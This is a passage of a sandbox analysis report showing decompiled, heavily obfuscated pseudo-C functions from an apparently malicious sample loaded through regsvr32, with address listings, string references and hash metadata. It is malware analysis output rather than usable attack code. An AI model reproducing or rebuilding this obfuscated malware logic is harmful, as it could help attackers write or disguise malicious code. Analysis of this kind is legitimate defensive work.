							E04F79AB1( *((intOrPtr*)(_t462 + 0x14)), _v580, _v588, _v584, _v592);
							_t503 =  &(_t503[3]);
							_t382 = 0x64a83;
						}
						continue;
					}
					_t501 = _t499;
					while(1) {
						_v584 = 0xf2af59;
						_t464 = 0x24;
						_v584 = _v584 / _t464;
						_v584 = _v584 ^ 0x0006bdc6;
						if( *((intOrPtr*)(_t501 + 4)) != _v584) {
							goto L12;
						}
						L11:
						_v588 = 0x1a29ac;
						_v588 = _v588 + 0x99a4;
						_v588 = _v588 * 0x1c;
						_v588 = _v588 << 0xe;
						_v588 = _v588 ^ 0x573bdc14;
						_v592 = 0x266a58;
						_v592 = _v592 + 0xffff3e46;
						_v592 = _v592 + 0xa537;
						_v592 = _v592 ^ 0x002a4b8f;
						if(E04F72460(_t501 + 0xc, _v544, _v588, _v592) == 0) {
							_t436 = 1;
							__eflags = 1;
							L15:
							_t500 = 0xbfaa1;
							goto L16;
						}
						L12:
						_t433 =  *_t501;
						if(_t433 == 0) {
							goto L15;
						}
						_t501 = _t501 + _t433;
						_v584 = 0xf2af59;
						_t464 = 0x24;
						_v584 = _v584 / _t464;
						_v584 = _v584 ^ 0x0006bdc6;
						if( *((intOrPtr*)(_t501 + 4)) != _v584) {
							goto L12;
						}
						goto L11;
					}
				}
				_v592 = 0x4a0541;
				_v592 = _v592 ^ 0x02e69c11;
				_t438 = 0x16;
				_v592 = _v592 * 0x18;
				_t439 = 9;
				_v592 = _v592 / _t438;
				_v592 = _v592 ^ 0x02ec09e8;
				_v576 = 0x9e7eed;
				_push(_t439);
				_v576 = _v576 / _t439;
				_v576 = _v576 ^ 0x00186ed0;
				E04F75B9E(_v592,  &_v520, __eflags, _v576);
				_v588 = 0x27b2d7;
				_t441 = 0x35;
				_v588 = _v588 / _t441;
				_v588 = _v588 + 0xc54c;
				_v588 = _v588 << 8;
				_v588 = _v588 ^ 0x018718d1;
				_v592 = 0xefdab0;
				_t442 = 0x23;
				_v592 = _v592 / _t442;
				_v592 = _v592 | 0x15622697;
				_v592 = _v592 + 0x9914;
				_v592 = _v592 ^ 0x1569e5c3;
				_t393 = E04F73E30(_v588,  &_v520, _v592);
				_v576 = 0xbf8258;
				_t503 =  &(_t503[3]);
				_v544 = _t393;
				_v576 = _v576 * 0x54;
				_v576 = _v576 ^ 0x3ed6c4e1;
				__eflags = 0;
				 *((short*)(_t393 - _v576 + _v576)) = 0;
				_t382 = 0xac157;
				goto L25;
			}

0x04f642b2
0x04f642ba
0x04f642be
0x04f642c2
0x04f642c6
0x04f642cb
0x04f642d3
0x04f642d8
0x04f642e0
0x04f642e4
0x04f642e8
0x04f642f8
0x04f6486b
0x00000000
0x04f6486b
0x04f64303
0x04f647dd
0x04f647e5
0x04f647ed
0x04f647f2
0x04f647fa
0x04f64800
0x04f6480d
0x04f6480e
0x04f64812
0x04f64816
0x04f6481e
0x04f64826
0x04f6482e
0x04f6483b
0x04f6483f
0x04f64844
0x04f64859
0x04f64860
0x04f64863
0x00000000
0x04f64863
0x04f6430e
0x04f6475b
0x04f64769
0x04f6476d
0x04f64775
0x04f6477a
0x04f64782
0x04f6478f
0x04f64793
0x04f64798
0x04f647a0
0x04f647a8
0x04f647b0
0x04f647b8
0x04f647cc
0x04f647d3
0x00000000
0x04f647d3
0x04f64319
0x04f64983
0x04f6498d
0x04f64997
0x04f6499b
0x04f649a3
0x04f649ab
0x04f649b3
0x04f649b8
0x04f649c5
0x04f649c9
0x04f649d1
0x04f649de
0x04f649e2
0x04f649e7
0x04f649e7
0x04f649e7
0x04f649fb
0x04f64a05
0x04f64a05
0x04f64a0e
0x04f64a0e
0x04f64324
0x04f645aa
0x04f645b4
0x04f645b9
0x04f645c1
0x04f645cf
0x04f645d4
0x04f645df
0x04f645e2
0x04f645e6
0x04f645ea
0x04f645f2
0x04f645fa
0x04f645ff
0x04f64607
0x04f6460f
0x04f64617
0x04f6461f
0x04f64627
0x04f6462f
0x04f6463c
0x04f64640
0x04f64648
0x04f64650
0x04f64658
0x04f64663
0x04f64664
0x04f6466a
0x04f64672
0x04f6467a
0x04f64682
0x04f6468a
0x04f64692
0x04f6469a
0x04f6469e
0x04f646a6
0x04f646ae
0x04f646b6
0x04f646be
0x04f646c6
0x04f646ce
0x04f646d6
0x04f646de
0x04f646e3
0x04f646eb
0x04f646f3
0x04f646fe
0x04f646ff
0x04f64707
0x04f6473e
0x04f64743
0x04f64745
0x04f64748
0x04f6474b
0x00000000
0x00000000
0x04f64751
0x00000000
0x04f64751
0x04f6432c
0x04f64976
0x04f64976
0x04f6497b
0x00000000
0x00000000
0x00000000
0x04f64981
0x04f64332
0x04f6433c
0x04f64344
0x04f64349
0x04f64351
0x04f64359
0x04f64361
0x04f64369
0x04f64371
0x04f64376
0x04f64382
0x04f64385
0x04f64389
0x04f64391
0x04f64399
0x04f6439e
0x04f643a6
0x04f643ae
0x04f643b6
0x04f643be
0x04f643c6
0x04f643ce
0x04f643d3
0x04f643db
0x04f643e3
0x04f643f1
0x04f643f2
0x04f643fe
0x04f64402
0x04f6440a
0x04f6443b
0x04f64440
0x04f64445
0x04f644ea
0x04f644ea
0x04f644ec
0x04f645a3
0x04f644f2
0x04f644f2
0x04f644fa
0x04f64502
0x04f6450a
0x04f64512
0x04f6451a
0x04f64522
0x04f6452a
0x04f64532
0x04f6453a
0x04f64542
0x04f6454f
0x04f64553
0x04f6455b
0x04f64563
0x04f64568
0x04f64570
0x04f64588
0x04f64591
0x04f64596
0x04f64599
0x04f64599
0x00000000
0x04f644ec
0x04f6444b
0x04f6444d
0x04f6444d
0x04f6445d
0x04f64460
0x04f64464
0x04f64473
0x00000000
0x00000000
0x04f64475
0x04f64475
0x04f64480
0x04f64491
0x04f64495
0x04f6449a
0x04f644a2
0x04f644aa
0x04f644b2
0x04f644ba
0x04f644d3
0x04f644e4
0x04f644e4
0x04f644e5
0x04f644e5
0x00000000
0x04f644e5
0x04f644d5
0x04f644d5
0x04f644d9
0x00000000
0x00000000
0x04f644db
0x04f6444d
0x04f6445d
0x04f64460
0x04f64464
0x04f64473
0x00000000
0x00000000
0x00000000
0x04f64473
0x04f6444d
0x04f64875
0x04f6487f
0x04f6488e
0x04f64891
0x04f6489b
0x04f6489c
0x04f648a2
0x04f648aa
0x04f648b8
0x04f648b9
0x04f648c1
0x04f648d1
0x04f648d6
0x04f648e6
0x04f648eb
0x04f648f1
0x04f648f9
0x04f648fe
0x04f64906
0x04f64912
0x04f64919
0x04f6491d
0x04f64925
0x04f6492d
0x04f6493d
0x04f64942
0x04f64951
0x04f64954
0x04f64958
0x04f6495c
0x04f6496c
0x04f6496e
0x04f64971
0x00000000

Strings

l, xrefs: 04F64361
Xj&, xrefs: 04F644A2
$~E, xrefs: 04F64798
]f, xrefs: 04F647DD
=%, xrefs: 04F64682

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFileFindNotification
String ID: $~E$=%$Xj&$]f$l
API String ID: 727422849-54573608
Opcode ID: 8cee024e76617ca88e331c775c7ca4eb9c8445c54b2f44629d4c276dae70b766
Instruction ID: 9d498f70460f064c4fbfb3355971f89fd09f968a39f58abb8237fc6ee61084fe
Opcode Fuzzy Hash: 8cee024e76617ca88e331c775c7ca4eb9c8445c54b2f44629d4c276dae70b766
Instruction Fuzzy Hash: A712FE715083429FD348CF25D54A41BBBE1FBD4B48F108A1EF496A6260D3B4DA4ACF9B

Uniqueness

Uniqueness Score: -1.00%

Function 04F63023 Relevance: 6.6, Strings: 5, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E04F63023(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				intOrPtr _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				void* _t433;
				short* _t437;
				void* _t444;
				signed int _t459;
				void* _t467;
				signed int _t487;
				signed int _t493;
				signed int _t495;
				signed int _t497;
				signed int _t499;
				signed int _t502;
				signed int _t503;
				signed int _t505;
				signed int _t539;
				signed int _t540;
				signed int* _t544;

				_t487 = __ecx;
				_t544 =  &_v2628;
				_v2608 = 0x6b532;
				_t539 = __ecx;
				_v2604 = 0x1640e;
				_t433 = 0xd3e83;
				do {
					while(_t433 != 0x8381b) {
						if(_t433 == 0xbbd25) {
							_v2628 = 0x3670de;
							_v2628 = _v2628 + 0xffff19fd;
							_v2628 = _v2628 + 0xffff07fa;
							_t499 = 0x16;
							_v2628 = _v2628 * 0x15;
							_v2628 = _v2628 ^ 0x04500b50;
							_v2620 = 0xe69801;
							_v2620 = _v2620 * 0x18;
							_v2620 = _v2620 + 0xffff30cd;
							_v2620 = _v2620 / _t499;
							_v2620 = _v2620 ^ 0x00f638dd;
							_v2612 = 0xde51b0;
							_v2612 = _v2612 + 0x6550;
							_v2612 = _v2612 ^ 0x4cb43ae6;
							_v2612 = _v2612 + 0xffffe7ec;
							_v2612 = _v2612 ^ 0x4c6f2202;
							_v2616 = 0x20064d;
							_v2616 = _v2616 + 0xffffddef;
							_v2616 = _v2616 ^ 0x97de4dce;
							_v2616 = _v2616 + 0xffff5947;
							_v2616 = _v2616 ^ 0x97c73790;
							_v2624 = 0x95fd63;
							_v2624 = _v2624 + 0xffffeca0;
							_v2624 = _v2624 + 0xbe2b;
							_v2624 = _v2624 + 0xc472;
							_v2624 = _v2624 ^ 0x00909314;
							_v2608 = 0x4b7e24;
							_v2608 = _v2608 >> 0xd;
							_v2608 = _v2608 ^ 0x000bcbc9;
							E04F79F8B(_v2628, _v2620 % _t499, _t499, _v2620,  &_v1040, _v2612, _v2616, _t499, _v2624, _v2608);
							_v2624 = 0xe8d47d;
							_v2624 = _v2624 * 0x5b;
							_v2624 = _v2624 + 0x918;
							_v2624 = _v2624 ^ 0x52c04100;
							_v2620 = 0x924f11;
							_v2620 = _v2620 ^ 0xe02a4b14;
							_v2620 = _v2620 << 7;
							_v2620 = _v2620 ^ 0x5c03460d;
							_v2608 = 0x8d1785;
							_v2608 = _v2608 + 0xffff9b1a;
							_v2608 = _v2608 ^ 0x008ae81d;
							_v2628 = 0x8a890d;
							_v2628 = _v2628 ^ 0xa0535375;
							_v2628 = _v2628 + 0xfbda;
							_v2628 = _v2628 + 0xffff7fd4;
							_v2628 = _v2628 ^ 0xa0d183f2;
							_t467 = E04F7D6A7(_v2624, _v2620, _v2608, 0x4f6187c, _v2628);
							_v2616 = 0x9b55ac;
							_v2616 = _v2616 + 0x99cb;
							_v2616 = _v2616 + 0xf14e;
							_v2616 = _v2616 ^ 0x00982613;
							_v2608 = 0x9f9fc;
							_v2608 = _v2608 + 0xc8dc;
							_v2608 = _v2608 ^ 0x0009a502;
							_v2628 = 0x5dfd45;
							_t502 = 0x77;
							_v2628 = _v2628 / _t502;
							_v2628 = _v2628 ^ 0x1ce238d7;
							_v2628 = _v2628 | 0xee7d47f3;
							_v2628 = _v2628 ^ 0xfef691ee;
							_v2624 = 0xc1e25b;
							_v2624 = _v2624 | 0x118a541c;
							_t503 = 0x4c;
							_v2624 = _v2624 / _t503;
							_v2624 = _v2624 ^ 0x0037dee5;
							_v2620 = 0xdc7230;
							_v2620 = _v2620 << 6;
							_v2620 = _v2620 >> 3;
							_v2620 = _v2620 ^ 0x06ebf48d;
							E04F736BB( &_v1040, __eflags, _t503, _v2608,  &_v2080, _v2628, _v2624, _t467, _v2620,  &_v520);
							_v2616 = 0x8dab89;
							_v2616 = _v2616 | 0xd6d464ae;
							_v2616 = _v2616 << 4;
							_t505 = 0x12;
							_v2616 = _v2616 / _t505;
							_v2616 = _v2616 ^ 0x0619126b;
							_v2624 = 0x83dd23;
							_v2624 = _v2624 << 1;
							_v2624 = _v2624 | 0x41f5cc30;
							_v2624 = _v2624 >> 0xb;
							_v2624 = _v2624 ^ 0x0009d10e;
							_v2620 = 0x6d7300;
							_v2620 = _v2620 + 0xffffbe44;
							_v2620 = _v2620 + 0xffff7100;
							_v2620 = _v2620 + 0xffffea8f;
							_v2620 = _v2620 ^ 0x006fc0a3;
							_v2628 = 0xa7d57b;
							_v2628 = _v2628 + 0xffff606c;
							_t540 = 0x37;
							_v2628 = _v2628 / _t540;
							_v2628 = _v2628 + 0xffff34b9;
							_v2628 = _v2628 ^ 0x000ec959;
							E04F6845B(_v2616, _v2624, _v2620, _v2628, _t467);
							_v2620 = 0x1dc97a;
							_v2620 = _v2620 ^ 0x7ccaad2b;
							_v2620 = _v2620 * 0x68;
							_v2620 = _v2620 ^ 0xb786af56;
							_v2628 = 0xc07f78;
							_v2628 = _v2628 << 6;
							_v2628 = _v2628 + 0xffffd1ef;
							_v2628 = _v2628 ^ 0x301f6e27;
							_v2616 = 0xafdab0;
							_v2616 = _v2616 / _t540;
							_v2616 = _v2616 ^ 0x0000c756;
							_v2624 = 0xd0fd9f;
							_v2624 = _v2624 * 0x18;
							_v2624 = _v2624 ^ 0x1390e106;
							_v2608 = 0xa4fa5a;
							_v2608 = _v2608 | 0xf278d31a;
							_t426 =  &_v2608;
							 *_t426 = _v2608 ^ 0xf2fa1e90;
							__eflags =  *_t426;
							return E04F73B17(_v2620, 0,  *_t426, _v2628, _v2616, _v2616,  &_v520, _v2624, 0, 0, _v2608);
						}
						if(_t433 != 0xd3e83) {
							goto L7;
						} else {
							_t433 = 0x8381b;
							continue;
						}
						L10:
						return _t459;
					}
					_v2620 = 0xe87cb5;
					_v2620 = _v2620 + 0xffff531f;
					_v2620 = _v2620 ^ 0x00eae769;
					_v2628 = 0x953273;
					_push(_t487);
					_v2628 = _v2628 * 0x28;
					_v2628 = _v2628 + 0xffff6398;
					_v2628 = _v2628 ^ 0x174df323;
					E04F75B9E(_v2620,  &_v2600, __eflags, _v2628);
					_v2620 = 0xac58bb;
					_v2620 = _v2620 >> 2;
					_v2620 = _v2620 + 0xffff2f3a;
					_v2620 = _v2620 ^ 0x002d8dce;
					_v2628 = 0x63a58e;
					_v2628 = _v2628 * 0x56;
					_v2628 = _v2628 ^ 0xc20d04c4;
					_v2628 = _v2628 ^ 0xe374b01d;
					_t437 = E04F73E30(_v2620,  &_v2600, _v2628);
					_push(0x6a);
					 *_t437 = 0;
					_v2628 = 0x7d01e6;
					_v2628 = _v2628 + 0xffff5edd;
					_v2628 = _v2628 + 0x4640;
					_v2628 = _v2628 ^ 0x007aef5e;
					_v2612 = 0x55af20;
					_v2612 = _v2612 | 0x41968445;
					_v2612 = _v2612 / 0;
					_v2612 = _v2612 ^ 0x4c84fd53;
					_v2612 = _v2612 ^ 0x4c135118;
					E04F619C8(_v2628, _v2612, __eflags,  &_v1560);
					_v2620 = 0x7c1b59;
					_v2620 = _v2620 | 0xcd333cb0;
					_v2620 = _v2620 + 0x45f3;
					_v2620 = _v2620 ^ 0xcd713133;
					_v2612 = 0x372829;
					_v2612 = _v2612 | 0x1352a9b2;
					_v2612 = _v2612 + 0xffff6354;
					_v2612 = _v2612 + 0xfffff893;
					_v2612 = _v2612 ^ 0x137b74ac;
					_v2624 = 0x6823a7;
					_v2624 = _v2624 >> 0xe;
					_v2624 = _v2624 ^ 0x000270b7;
					_v2628 = 0x4740e9;
					_v2628 = _v2628 << 6;
					_t493 = 0x64;
					_v2628 = _v2628 / _t493;
					_v2628 = _v2628 ^ 0x002fcf39;
					_t444 = E04F7D6A7(_v2620, _v2612, _v2624, 0x4f6182c, _v2628);
					_v2624 = 0xfc7394;
					_v2624 = _v2624 + 0xffffa37d;
					_v2624 = _v2624 ^ 0x00f198ae;
					_v2616 = 0xe0c422;
					_v2616 = _v2616 >> 1;
					_v2616 = _v2616 | 0x237bc0f7;
					_v2616 = _v2616 << 5;
					_v2616 = _v2616 ^ 0x6f741880;
					_v2620 = 0xb89dea;
					_v2620 = _v2620 | 0xea5eebc8;
					_t495 = 0x21;
					_v2620 = _v2620 / _t495;
					_v2620 = _v2620 ^ 0x071c490a;
					_v2612 = 0x767d4f;
					_v2612 = _v2612 ^ 0x821751df;
					_v2612 = _v2612 >> 0xb;
					_v2612 = _v2612 << 0x10;
					_v2612 = _v2612 ^ 0x4c21a93d;
					_v2628 = 0x1c367d;
					_v2628 = _v2628 << 6;
					_v2628 = _v2628 * 0x3d;
					_v2628 = _v2628 ^ 0xae3b4f29;
					E04F736BB( &_v2600, __eflags, _t495, _v2616,  &_v1560, _v2620, _v2612, _t444, _v2628,  &_v2080);
					_v2624 = 0xc32395;
					_v2624 = _v2624 | 0xb330216c;
					_v2624 = _v2624 << 0xb;
					_v2624 = _v2624 >> 3;
					_v2624 = _v2624 ^ 0x132b8101;
					_v2628 = 0x29fc2e;
					_t497 = 5;
					_v2628 = _v2628 * 9;
					_v2628 = _v2628 ^ 0x01744d78;
					_v2612 = 0xa1c7d7;
					_v2612 = _v2612 << 0xb;
					_v2612 = _v2612 << 9;
					_v2612 = _v2612 + 0x6d93;
					_v2612 = _v2612 ^ 0x7d7b7db5;
					_v2616 = 0x5841b8;
					_v2616 = _v2616 << 3;
					_v2616 = _v2616 + 0xfffff7e4;
					_v2616 = _v2616 / _t497;
					_v2616 = _v2616 ^ 0x00853d03;
					E04F6845B(_v2624, _v2628, _v2612, _v2616, _t444);
					_v2624 = 0xbf00db;
					_v2624 = _v2624 * 0x3c;
					_v2624 = _v2624 * 0x35;
					_v2624 = _v2624 ^ 0x75a5cd3f;
					_v2624 = _v2624 ^ 0x31392b9d;
					_v2628 = 0x721793;
					_v2628 = _v2628 * 0xd;
					_v2628 = _v2628 + 0xffff4d5e;
					_v2628 = _v2628 ^ 0x05cf58c1;
					_t487 = _v2624;
					_t459 = E04F775AD(_t487, _v2628,  &_v2080, _t539);
					_t544 =  &(_t544[0x14]);
					__eflags = _t459;
					if(_t459 != 0) {
						_t433 = 0xbbd25;
						goto L7;
					}
					goto L10;
					L7:
					__eflags = _t433 - 0x9fc3d;
				} while (__eflags != 0);
				return _t433;
			}

0x04f63023
0x04f63023
0x04f6302d
0x04f63035
0x04f63037
0x04f6303f
0x04f6304e
0x04f6304e
0x04f63054
0x04f633f8
0x04f63402
0x04f6340a
0x04f63419
0x04f6341a
0x04f6341e
0x04f63426
0x04f63433
0x04f63437
0x04f63445
0x04f63450
0x04f63458
0x04f63460
0x04f63468
0x04f63470
0x04f63478
0x04f63480
0x04f63488
0x04f63490
0x04f63498
0x04f634a0
0x04f634a8
0x04f634b0
0x04f634b8
0x04f634c0
0x04f634c8
0x04f634d0
0x04f634d8
0x04f634dd
0x04f63500
0x04f63505
0x04f63512
0x04f63516
0x04f6351e
0x04f63526
0x04f6352e
0x04f63536
0x04f6353b
0x04f63543
0x04f6354b
0x04f63553
0x04f6355b
0x04f63563
0x04f6356b
0x04f63573
0x04f6357b
0x04f63598
0x04f6359d
0x04f635a8
0x04f635b2
0x04f635ba
0x04f635c2
0x04f635ca
0x04f635d2
0x04f635dc
0x04f635ea
0x04f635ef
0x04f635f5
0x04f635fd
0x04f63605
0x04f6360d
0x04f63615
0x04f63621
0x04f6362b
0x04f63636
0x04f6363e
0x04f63646
0x04f6364b
0x04f63650
0x04f63677
0x04f6367c
0x04f63686
0x04f6368e
0x04f63699
0x04f6369e
0x04f636a4
0x04f636ac
0x04f636b4
0x04f636b8
0x04f636c0
0x04f636c5
0x04f636cd
0x04f636d5
0x04f636dd
0x04f636e5
0x04f636ed
0x04f636f5
0x04f636fd
0x04f63709
0x04f6370d
0x04f63711
0x04f63719
0x04f63731
0x04f63736
0x04f63741
0x04f6374e
0x04f63752
0x04f6375a
0x04f63762
0x04f63767
0x04f6376f
0x04f63777
0x04f63789
0x04f6378d
0x04f63795
0x04f637a2
0x04f637ad
0x04f637b5
0x04f637bd
0x04f637c5
0x04f637c5
0x04f637c5
0x00000000
0x04f637ec
0x04f6305f
0x00000000
0x04f63065
0x04f63065
0x00000000
0x04f63065
0x04f637f9
0x04f637f9
0x04f637f9
0x04f63069
0x04f63075
0x04f6307d
0x04f63085
0x04f63092
0x04f63093
0x04f63097
0x04f6309f
0x04f630af
0x04f630b4
0x04f630c0
0x04f630c5
0x04f630cd
0x04f630d5
0x04f630e2
0x04f630e6
0x04f630ee
0x04f630fe
0x04f63107
0x04f63109
0x04f6310c
0x04f63114
0x04f6311c
0x04f63124
0x04f6312c
0x04f63134
0x04f63143
0x04f6314e
0x04f63156
0x04f63167
0x04f6316c
0x04f63176
0x04f6317e
0x04f63186
0x04f6318e
0x04f63196
0x04f6319e
0x04f631a6
0x04f631ae
0x04f631b6
0x04f631be
0x04f631c3
0x04f631cb
0x04f631d3
0x04f631de
0x04f631e1
0x04f631e5
0x04f63202
0x04f63207
0x04f63212
0x04f6321c
0x04f63224
0x04f6322c
0x04f63230
0x04f6323a
0x04f6323f
0x04f63247
0x04f6324f
0x04f6325d
0x04f63264
0x04f63268
0x04f63270
0x04f63278
0x04f63280
0x04f63285
0x04f6328a
0x04f63292
0x04f6329a
0x04f632a4
0x04f632af
0x04f632d6
0x04f632db
0x04f632e5
0x04f632ed
0x04f632f2
0x04f632f7
0x04f632ff
0x04f6330e
0x04f63310
0x04f63314
0x04f6331c
0x04f63324
0x04f63329
0x04f6332e
0x04f63336
0x04f6333e
0x04f63346
0x04f6334b
0x04f63359
0x04f6335d
0x04f63375
0x04f6337a
0x04f63388
0x04f63391
0x04f63395
0x04f6339d
0x04f633a5
0x04f633b2
0x04f633bd
0x04f633c5
0x04f633d2
0x04f633d6
0x04f633db
0x04f633de
0x04f633e0
0x04f633e6
0x00000000
0x04f633e6
0x00000000
0x04f633e8
0x04f633e8
0x04f633e8
0x00000000

Strings

)(7, xrefs: 04F6318E
Pe, xrefs: 04F63460
$~K, xrefs: 04F634D0
O}v, xrefs: 04F63270
i, xrefs: 04F6307D

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $~K$)(7$O}v$Pe$i
API String ID: 0-424040343
Opcode ID: e7e7010af114139305fc0f6e83e2df298a6a8ca31d9c6582e782febac0ef6a14
Instruction ID: d3fc792b3d1df693f2af977eb976578790eda906149b61de895db5d76e706f14
Opcode Fuzzy Hash: e7e7010af114139305fc0f6e83e2df298a6a8ca31d9c6582e782febac0ef6a14
Instruction Fuzzy Hash: DE12FF71509342ABC398CF20C98980BBBF1BBD9758F405A1DF1DA96260D3B5DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 04F637FA Relevance: 6.5, Strings: 5, Instructions: 265
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04F637FA() {
				signed int _t244;
				intOrPtr _t248;
				signed int _t249;
				void* _t260;
				signed char _t270;
				signed int* _t272;
				signed int _t286;
				signed int* _t288;
				signed int _t289;
				signed int _t290;
				signed char _t294;
				signed int* _t295;
				signed int _t296;
				signed int _t300;
				void* _t321;
				intOrPtr _t323;
				signed int _t329;
				void* _t331;

				 *(_t331 + 0x30) =  *(_t331 + 0x30) & 0x00000000;
				_t244 = 0x7bdcf;
				_t329 =  *(_t331 + 0x30);
				_t323 =  *((intOrPtr*)(_t331 + 0x38));
				 *((intOrPtr*)(_t331 + 0x3c)) = 0xa3602;
				while(1) {
					L1:
					_t286 =  *(_t331 + 0x2c);
					L2:
					while(_t244 != 0x294e6) {
						if(_t244 == 0x3da8e) {
							 *((char*)(_t331 + 0x13)) =  *((intOrPtr*)(_t323 + 1));
							 *(_t331 + 0x1c) = 0x510da1;
							 *((char*)(_t331 + 0x16)) =  *((intOrPtr*)(_t323 + 2));
							_t289 = 0x17;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) / _t289;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0x8ef;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) << 1;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x0005a377;
							 *(_t331 + 0x1c) = 0x69bf77;
							 *(_t331 + 0x1c) =  *(_t331 + 0x1c) >> 8;
							 *(_t331 + 0x1c) =  *(_t331 + 0x1c) ^ 0xb59bb26a;
							 *(_t331 + 0x1c) =  *(_t331 + 0x1c) + 0x3cdd;
							 *(_t331 + 0x1c) =  *(_t331 + 0x1c) ^ 0xb59db987;
							 *(_t331 + 0x18) = 0xd9aae7;
							 *(_t331 + 0x18) =  *(_t331 + 0x18) >> 5;
							_t290 = 6;
							 *(_t331 + 0x14) =  *(_t331 + 0x18) * 0x30;
							 *(_t331 + 0x14) =  *(_t331 + 0x14) / _t290;
							 *(_t331 + 0x14) =  *(_t331 + 0x14) ^ 0x00316a1b;
							 *(_t331 + 0x20) = 0xd8a3ca;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0xffffb79d;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) + 0xffff8797;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x00d55c53;
							_t260 = E04F7D6A7( *(_t331 + 0x28),  *(_t331 + 0x24),  *(_t331 + 0x1c), 0x4f61030,  *(_t331 + 0x20));
							 *(_t331 + 0x30) = 0x7cc1f3;
							 *(_t331 + 0x30) =  *(_t331 + 0x30) + 0x392f;
							 *(_t331 + 0x30) =  *(_t331 + 0x30) + 0xb537;
							 *(_t331 + 0x30) =  *(_t331 + 0x30) ^ 0x0075a0e4;
							 *(_t331 + 0x24) = 0xac2551;
							 *(_t331 + 0x24) =  *(_t331 + 0x24) << 0xb;
							 *(_t331 + 0x24) =  *(_t331 + 0x24) ^ 0xa822d467;
							 *(_t331 + 0x24) =  *(_t331 + 0x24) | 0x9b4fa6bf;
							 *(_t331 + 0x24) =  *(_t331 + 0x24) ^ 0xdb41f9d9;
							 *(_t331 + 0x20) = 0xf0c259;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0xa6ae1263;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) >> 0xc;
							 *(_t331 + 0x20) =  *(_t331 + 0x20) ^ 0x000fc688;
							 *(_t331 + 0x34) = 0x750a04;
							 *(_t331 + 0x34) =  *(_t331 + 0x34) << 0xe;
							 *(_t331 + 0x34) =  *(_t331 + 0x34) ^ 0x4287757f;
							 *(_t331 + 0x28) = 0xb624ea;
							 *(_t331 + 0x28) =  *(_t331 + 0x28) + 0xef4;
							 *(_t331 + 0x28) =  *(_t331 + 0x28) * 0xe;
							_t117 = _t329 + 0x28; // 0x28
							 *(_t331 + 0x28) =  *(_t331 + 0x28) + 0xe49d;
							 *(_t331 + 0x28) =  *(_t331 + 0x28) ^ 0x09fbcfd5;
							 *(_t331 + 0x2c) = 0x1e1d0e;
							 *(_t331 + 0x2c) =  *(_t331 + 0x2c) + 0x5424;
							 *(_t331 + 0x2c) =  *(_t331 + 0x2c) + 0xffffaf16;
							 *(_t331 + 0x2c) =  *(_t331 + 0x2c) ^ 0x0019c444;
							E04F7BEB5( *(_t331 + 0x5c), __eflags,  *((intOrPtr*)(_t331 + 0x4c)),  *((intOrPtr*)(_t331 + 0x44)), 0x10,  *((intOrPtr*)(_t331 + 0x50)),  *(_t331 + 0x36) & 0x000000ff,  *(_t323 + 3) & 0x000000ff, _t260,  *(_t331 + 0x34),  *(_t323 + 3) & 0x000000ff,  *(_t331 + 0x30), _t117);
							 *(_t331 + 0x58) = 0x6bc351;
							 *(_t331 + 0x58) =  *(_t331 + 0x58) + 0xffff4d63;
							 *(_t331 + 0x58) =  *(_t331 + 0x58) | 0xe4fc4e6e;
							 *(_t331 + 0x58) =  *(_t331 + 0x58) ^ 0xe4f093da;
							 *(_t331 + 0x60) = 0xab4f6;
							 *(_t331 + 0x60) =  *(_t331 + 0x60) >> 4;
							 *(_t331 + 0x60) =  *(_t331 + 0x60) ^ 0x000fda7b;
							 *(_t331 + 0x5c) = 0x51b975;
							 *(_t331 + 0x5c) =  *(_t331 + 0x5c) << 0xb;
							 *(_t331 + 0x5c) =  *(_t331 + 0x5c) + 0xa37c;
							 *(_t331 + 0x5c) =  *(_t331 + 0x5c) ^ 0x8dc38b8a;
							 *(_t331 + 0x54) = 0xc8cd5f;
							 *(_t331 + 0x54) =  *(_t331 + 0x54) + 0xffffe92f;
							 *(_t331 + 0x54) =  *(_t331 + 0x54) + 0x11d4;
							 *(_t331 + 0x58) =  *(_t331 + 0x54) * 0xa;
							 *(_t331 + 0x58) =  *(_t331 + 0x58) ^ 0x07d9c23f;
							E04F6845B( *((intOrPtr*)(_t331 + 0x64)),  *((intOrPtr*)(_t331 + 0x6c)),  *((intOrPtr*)(_t331 + 0x64)),  *(_t331 + 0x58), _t260);
							_t331 = _t331 + 0x44;
							 *(_t329 + 0x20) = ( *(_t323 + 4) & 0x000000ff) << 0x00000008 |  *(_t323 + 5) & 0x000000ff;
							_t270 =  *((intOrPtr*)(_t323 + 6));
							_t294 =  *((intOrPtr*)(_t323 + 7));
							_t323 = _t323 + 8;
							_t244 = 0x3eabb;
							 *(_t329 + 0x18) = (_t270 & 0x000000ff) << 0x00000008 | _t294 & 0x000000ff;
							goto L1;
						} else {
							if(_t244 == 0x3eabb) {
